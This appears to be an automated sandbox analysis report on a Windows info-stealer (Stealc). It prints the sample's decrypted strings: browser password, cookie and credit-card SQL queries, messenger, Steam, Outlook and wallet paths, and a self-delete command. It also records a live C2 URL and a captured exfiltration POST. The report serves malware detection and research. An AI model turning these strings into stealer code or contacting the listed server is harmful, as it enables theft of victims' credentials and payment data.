Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetDC
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.20000.0.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.20000.0.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.20000.0.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PATH
Source: 0.2.file.exe.20000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.20000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.20000.0.unpack	String decryptor: browser:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: profile:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: url:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: login:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: password:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Opera
Source: 0.2.file.exe.20000.0.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Network
Source: 0.2.file.exe.20000.0.unpack	String decryptor: cookies
Source: 0.2.file.exe.20000.0.unpack	String decryptor: .txt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.20000.0.unpack	String decryptor: TRUE
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FALSE
Source: 0.2.file.exe.20000.0.unpack	String decryptor: autofill
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.20000.0.unpack	String decryptor: history
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.20000.0.unpack	String decryptor: cc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.20000.0.unpack	String decryptor: name:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: month:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: year:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: card:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Cookies
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Login Data
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Web Data
Source: 0.2.file.exe.20000.0.unpack	String decryptor: History
Source: 0.2.file.exe.20000.0.unpack	String decryptor: logins.json
Source: 0.2.file.exe.20000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.20000.0.unpack	String decryptor: usernameField
Source: 0.2.file.exe.20000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.20000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.20000.0.unpack	String decryptor: guid
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.20000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.20000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.20000.0.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.20000.0.unpack	String decryptor: plugins
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.20000.0.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.20000.0.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.20000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Local State
Source: 0.2.file.exe.20000.0.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.20000.0.unpack	String decryptor: chrome
Source: 0.2.file.exe.20000.0.unpack	String decryptor: opera
Source: 0.2.file.exe.20000.0.unpack	String decryptor: firefox
Source: 0.2.file.exe.20000.0.unpack	String decryptor: wallets
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ProductName
Source: 0.2.file.exe.20000.0.unpack	String decryptor: x32
Source: 0.2.file.exe.20000.0.unpack	String decryptor: x64
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ProcessorNameString
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.20000.0.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - OS:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Language:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: All Users:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Current User:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Process List:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: .exe
Source: 0.2.file.exe.20000.0.unpack	String decryptor: runas
Source: 0.2.file.exe.20000.0.unpack	String decryptor: open
Source: 0.2.file.exe.20000.0.unpack	String decryptor: /c start
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.20000.0.unpack	String decryptor: files
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \discord\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: key_datas
Source: 0.2.file.exe.20000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: map*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Telegram
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Tox
Source: 0.2.file.exe.20000.0.unpack	String decryptor: *.tox
Source: 0.2.file.exe.20000.0.unpack	String decryptor: *.ini
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Password
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 00000001
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 00000002
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 00000003
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 00000004
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.20000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.20000.0.unpack	String decryptor: token:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \config\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: browsers
Source: 0.2.file.exe.20000.0.unpack	String decryptor: done
Source: 0.2.file.exe.20000.0.unpack	String decryptor: soft
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.20000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.20000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.20000.0.unpack	String decryptor: https
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.20000.0.unpack	String decryptor: POST
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.20000.0.unpack	String decryptor: hwid
Source: 0.2.file.exe.20000.0.unpack	String decryptor: build
Source: 0.2.file.exe.20000.0.unpack	String decryptor: token
Source: 0.2.file.exe.20000.0.unpack	String decryptor: file_name
Source: 0.2.file.exe.20000.0.unpack	String decryptor: file
Source: 0.2.file.exe.20000.0.unpack	String decryptor: message
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.20000.0.unpack	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00039030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00039030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_0002A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000272A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_000272A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002A2B0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_0002A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0002C920

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000340F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_000340F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0002E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00021710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00021710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0002F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000347C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_000347C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00033B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00033B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00034B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00034B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0002DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0002EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0002BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0002DF10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.206/6c4adf523b719729.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 36 46 43 41 34 37 37 30 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"D06FCA4770BC4158135236------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"tale------KJKEHIIJJECFHJKECFHD--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.206 185.215.113.206

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

0_2_000262D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1800359502.0000000001016000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1800359502.0000000001016000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa-
Source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00060098	0_2_00060098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040317A	0_2_0040317A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00052138	0_2_00052138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118	0_2_00476118
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007B198	0_2_0007B198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0008E258	0_2_0008E258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00064288	0_2_00064288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000AB308	0_2_000AB308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047B37C	0_2_0047B37C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0009D39E	0_2_0009D39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0046F4E4	0_2_0046F4E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003724CD	0_2_003724CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004E544	0_2_0004E544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00044573	0_2_00044573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0008D5A8	0_2_0008D5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000645A8	0_2_000645A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003A3621	0_2_003A3621
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0009A648	0_2_0009A648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000666C8	0_2_000666C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000A96FD	0_2_000A96FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007D720	0_2_0007D720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00096799	0_2_00096799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0048379E	0_2_0048379E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042C7A9	0_2_0042C7A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00074868	0_2_00074868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007B8A8	0_2_0007B8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004658FB	0_2_004658FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000798B8	0_2_000798B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0008F8D6	0_2_0008F8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0044E8A7	0_2_0044E8A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036D9E5	0_2_0036D9E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003B7A29	0_2_003B7A29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00090B88	0_2_00090B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00358BBD	0_2_00358BBD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00094BA8	0_2_00094BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047EBF6	0_2_0047EBF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0009AC28	0_2_0009AC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00477C17	0_2_00477C17
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0008AD38	0_2_0008AD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007BD68	0_2_0007BD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00051D78	0_2_00051D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00075DB9	0_2_00075DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00074DC8	0_2_00074DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00471D9B	0_2_00471D9B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00479DB9	0_2_00479DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00068E78	0_2_00068E78
